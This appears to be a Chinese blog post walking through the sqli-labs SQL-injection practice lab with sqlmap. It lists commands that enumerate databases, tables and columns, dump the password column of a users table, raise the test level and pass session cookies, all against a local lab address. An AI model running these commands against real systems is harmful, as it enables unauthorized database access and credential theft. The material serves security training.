admin 管理员组

文章数量: 1086019


2024年3月10日发(作者:samanth)

sql-labs -less1~sql-labs-less9

获取当前数据库名称:

语法:sqlmap -u [“url”] --current-db

1sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" --current-db

获取指定数据库的表名:

语法:sqlmap -u [“url”] -D [‘数据库名’] --tables

1sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security --tables

获取指定数据库指定表中的字段:

语法:sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns

1sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security -T users --columns

获取指定数据库指定表的指定字段的字段内容:

语法:sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump

1sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security -T users -C password --dump

sql-labs-less10

1sqlmap -u "192.168.0.6/sqli-labs-master/Less-10/?id=1" --current-db

提升等级 -level 2

1sqlmap -u "192.168.0.6/sqli-labs-master/Less-10/?id=1" -level 2 --current-db

1

sqlmap -u "192.168.0.6/sqli-labs-master/Less-20/" --

cookie "pma_lang=zh_CN;pma_mcrypt_iv=AoXpKxU5KcY%3D;pmaUser-1=7%2FwV%2BDOfbmI%3D;uname=admin;" --level 2


本文标签: 指定 数据库 获取 字段 字段名